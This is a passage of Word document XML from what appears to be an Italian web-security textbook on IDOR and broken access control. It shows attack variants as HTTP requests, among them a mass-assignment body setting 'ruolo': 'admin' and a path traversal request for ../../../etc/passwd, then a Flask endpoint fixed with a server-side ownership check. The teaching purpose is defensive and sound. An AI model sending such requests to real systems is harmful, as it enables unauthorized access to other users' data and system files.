        <w:t xml:space="preserve">UUID di una vittima, l’IDOR è sfruttabile esattamente come prima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Gli UUID non sostituiscono il controllo di autorizzazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: lo rendono solo statisticamente più difficile da sfruttare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">da fuori</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un dipendente interno o un utente legittimo che vede gli UUID nella propria sessione può ancora abusarne contro altri utenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1107"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Spesso vengono usati UUID v1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, che incorporano timestamp e MAC address: sono prevedibili. Solo gli</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">UUID v4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(interamente casuali) sono crittograficamente robusti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusione:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">gli UUID sono una difesa in profondità complementare, non un sostituto del controllo di autorizzazione.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="266"/>
    <w:bookmarkStart w:id="267" w:name="variante-2-idor-su-username-nel-path"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variante 2: IDOR su username nel path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/profilo/mario      → vedo il profilo di Mario</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/profilo/giulia     → vedo il profilo di Giulia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stesso problema, identificatore diverso. Anche qui serve verificare che chi chiede sia autorizzato a vedere quel profilo (o che il profilo sia pubblico).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="267"/>
    <w:bookmarkStart w:id="268" w:name="X94be38254a5a825094020e0dc1c17fbf55a083e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variante 3: IDOR nel body di una POST/PATCH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un caso particolarmente subdolo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/messaggio/47</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "id": 47, "testo": "Modifico il mio messaggio" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sembra OK: stiamo modificando il messaggio 47. Ma cosa succede se invio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/messaggio/47</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "id": 99, "testo": "Modifico il messaggio di un altro" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’endpoint potrebbe usare l’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal body invece di quello dall’URL, e modificare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">un messaggio diverso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È un IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nascosto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel body. Più subdolo del classico perché non si vede dall’URL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non fidarsi mai degli ID nel body quando l’URL contiene già la risorsa target. Usare l’URL come fonte di verità e ignorare campi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nel body.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="268"/>
    <w:bookmarkStart w:id="269" w:name="variante-4-mass-assignment"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variante 4: Mass Assignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Già vista nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_1" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (caso eBay 2008, GitHub 2012) e accennata nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_3" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">-bis. È un IDOR sui</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">campi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece che sui record:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/utenti/me</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "email": "nuova@esempio.it" }   # OK, l'utente cambia la propria email</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PATCH /api/utenti/me</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">{ "email": "...", "ruolo": "admin", "saldo": 999999 }   # ❌</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se il server applica indistintamente tutti i campi del body al modello, l’utente si è promosso ad admin e si è regalato un milione di euro.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">whitelist hard-coded dei campi modificabili.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="269"/>
    <w:bookmarkStart w:id="270" w:name="Xc3621b157733400298b3227de3c744d69757966"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Variante 5: IDOR via path traversal (anteprima Cap. 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/download?file=fattura_42.pdf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cosa succede se invio:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /api/download?file=../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tecnicamente è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ha un capitolo dedicato (</w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">), ma concettualmente è un’altra forma di Broken Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="270"/>
    <w:bookmarkEnd w:id="271"/>
    <w:bookmarkStart w:id="278" w:name="Xf2f81de9d7501194a2af88fbaf3835d6e0a183b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="517" w:name="sec_6_7"/>
      <w:r>
        <w:t xml:space="preserve">6.7 La correzione: ownership check server-side</w:t>
      </w:r>
      <w:bookmarkEnd w:id="517"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ora la difesa. Apri di nuovo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini/app.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e modifica l’endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fattura()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">così:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># DETTAGLIO FATTURA — VERSIONE SICURA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/fattura/&lt;int:fattura_id&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fattura(fattura_id):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Controllo di autenticazione</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utente_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ✅ Controllo di autorizzazione: la fattura deve appartenere all'utente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT fatture.id, fatture.descrizione, fatture.importo, fatture.data,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">               utenti.username</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM fatture JOIN utenti ON fatture.utente_id = utenti.id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE fatture.id = ? AND fatture.utente_id = ?</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (fattura_id, utente_id))</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># NB: restituiamo 404 anche se la fattura esiste ma non è dell'utente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vedi </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_6_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">sezione 6.8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulla scelta 403 vs 404</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;h2&gt;Fattura non trovata&lt;/h2&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">404</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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;html&gt;&lt;head&gt;&lt;title&gt;Fattura </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h1&gt;Fattura n° </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Intestatario:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[4] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Data:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[3] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Descrizione:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> r[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;p&gt;&lt;b&gt;Importo:&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">               {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f r[2] &gt;= 0 %}+{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndif %}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">%.2f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"|format(r[2]) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> €&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;hr&gt;&lt;a href="/dashboard"&gt;⬅ Dashboard&lt;/a&gt;</w:t>
      </w:r>
      <w:r>
